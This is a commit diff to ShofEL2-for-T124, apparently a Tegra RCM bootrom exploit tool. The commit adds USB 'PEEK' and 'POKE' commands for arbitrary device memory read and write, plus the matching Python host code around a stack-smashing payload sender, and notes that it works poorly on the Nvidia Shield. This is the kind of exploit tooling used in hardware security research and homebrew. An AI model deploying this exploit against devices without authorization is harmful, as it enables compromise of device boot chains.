Added code that will do memdumping based on architecture, but code is not functioning well on the nvidia shield

ShofEL2-for-T124/payloads/payload.c

@@ -35,7 +35,7 @@ void payload_main() {
     usb_log("cmd_handler", &error_code);
     while(1){
         usb_read(&data, 4, &error_code);
-        if(data[0] == 'M' && data[1] == 'E' && data[2] == 'M' && data[3] == 'D') {
+        if(data[0] == 'P' && data[1] == 'E' && data[2] == 'E' && data[3] == 'K') {
             usb_write(&data, 4, &error_code);
             usb_read(&data, 8,&error_code); // Receive uint64_t size and and uint32_t offset
             mem_off = *(uint32_t *)data;
@@ -53,6 +53,27 @@ void payload_main() {
                 }
             }
         }
+        else if(data[0] == 'P' && data[1] == 'O' && data[2] == 'K' && data[3] == 'E') {
+            usb_write(&data, 4, &error_code);
+            usb_read(&data, 8, &error_code); // Receive uint64_t size and and uint32_t offset
+            mem_off = *(uint32_t *)data;
+            mem_sz = *(uint32_t *)(data+4);
+
+            for(unsigned int i=0;i<mem_sz;i+=0x200) {
+                if((mem_sz - i) < 0x200) {
+                    blk_sz = mem_sz - i;
+                } else {
+                    blk_sz = 0x200;
+                }
+                usb_read((void *) (mem_off + i), blk_sz, &error_code);
+                usb_log("OK", &error_code);
+                usb_read(&data, 4, &error_code);
+
+                if(!(data[0] == 'A' && data[1] == 'C' && data[2] == 'K')) {
+                    break;
+                }
+            }
+        }
         usb_log("done", &error_code);
     }
 }

exploit.py

@@ -107,7 +107,8 @@ class TegraRCM():
                 info(f"Done on {fd}")
                 return status
             except Exception as e:
-                print(str(e))
+                pass
+                # print(str(e))
         return None
 
     def __init__(self):
@@ -194,12 +195,11 @@ class TegraRCM():
         self.dev.write(rcm_cmd_buf.read())
         payload_file_fd.close()
 
-    def send_payload(self, payload):
+    def send_payload(self, payload, thumb=1):
         '''
         Sends user specified payload to device
         '''
-
+        self.send_rcm_cmd(payload, thumb)
-        self.send_rcm_cmd(payload, 1)
 
         #Smash the stack
         status = self.ep0_read_unbounded(BOOTROM_SMASH_LEN)
@@ -220,7 +220,7 @@ class TegraRCM():
             error("Error on writing vbar!")
 
     def memdump_region(self, offset, size):
-        if(not self.send_verify_cmd(b"MEMD")):
+        if(not self.send_verify_cmd(b"PEEK")):
             return
         mem_param = struct.pack('<LL', offset, size)
         self.dev.write(mem_param)
@@ -235,6 +235,44 @@ class TegraRCM():
             received += d
         self.handle_done()
         return received
+    
+    def memwrite_region(self, address, data, check=True):
+        '''
+        Write a blob of data to an address on the device. Sometimes this function has issues when writing more than 0x20 bytes of data
+
+        Args:
+
+            :param (int): address: Address to write to
+            :param (bytes): data: Binary data to write to the device
+            :param (Bool): check if data is really written by dumping the region and checking if it has changed
+        '''
+        size = len(data)
+        if(check):
+            before = self.memdump_region(address, size)
+
+        if(not self.send_verify_cmd(b"POKE")):
+            return
+        mem_param = struct.pack('<II', address, size)
+        self.dev.write(mem_param)
+
+        while len(data) > 0:
+            remaining = 0x200
+            if(len(data) < 0x200):
+                remaining = len(data)
+            send = data[:remaining]
+            data = data[remaining:]
+            self.dev.write(send)
+            message = self.dev.read(0x200)
+            if(message != b"OK"):
+                error("Error on writing data to device!")
+                return
+            self.dev.write(b"ACK\x00")
+        self.handle_done()
+        #Read back data
+        if(check):
+            after = self.memdump_region(address, size)
+            if(after == before and send != before):
+                error(f"Memory written succesfully, but no changes detected! | {hex(address)}")
 
     def search_bootrom(self):
         dumped = BytesIO()
@@ -244,7 +282,7 @@ class TegraRCM():
             if(cpsr_to_r0_ins in d or r1_to_cpsr in d):
                 info(f"Found cpsr instruction at {hex(i)}")
             print(".", end="")
-        info(f"dumped {hex(len(dumped))} data")
+        # info(f"dumped {hex(len(dumped))} data")
 
     def dump_bootrom(self):
         d = self.memdump_region(0x100000, 0x1000)
@@ -255,6 +293,7 @@ class TegraRCM():
         while True:
             cmd = self.dev.read(0x200)
             if(cmd == b"cmd_handler"):
+                self.memwrite_region(0x40000000, 0x100 * b"\xaa")
                 self.search_bootrom()
                 #dump memory
                 self.dump_bootrom()
@@ -263,9 +302,16 @@ class TegraRCM():
 if __name__ == "__main__":
     parser = argparse.ArgumentParser()
     parser.add_argument("payload", help="Payload to send to the tablet")
+    parser.add_argument("--ga", help="Prepare for GA", action="store_true")
 
     args = parser.parse_args()
     rcm = TegraRCM()
     rcm.dev.read_chip_id()
     rcm.send_payload(args.payload)
-    rcm.cmd_handler()
+    if args.ga:
+        d = rcm.dev.read(4)
+        d2 = rcm.dev.read(0x200)
+        if d == b"GiAs": 
+            ok("Device in GA debugger")
+    else:
+        rcm.cmd_handler()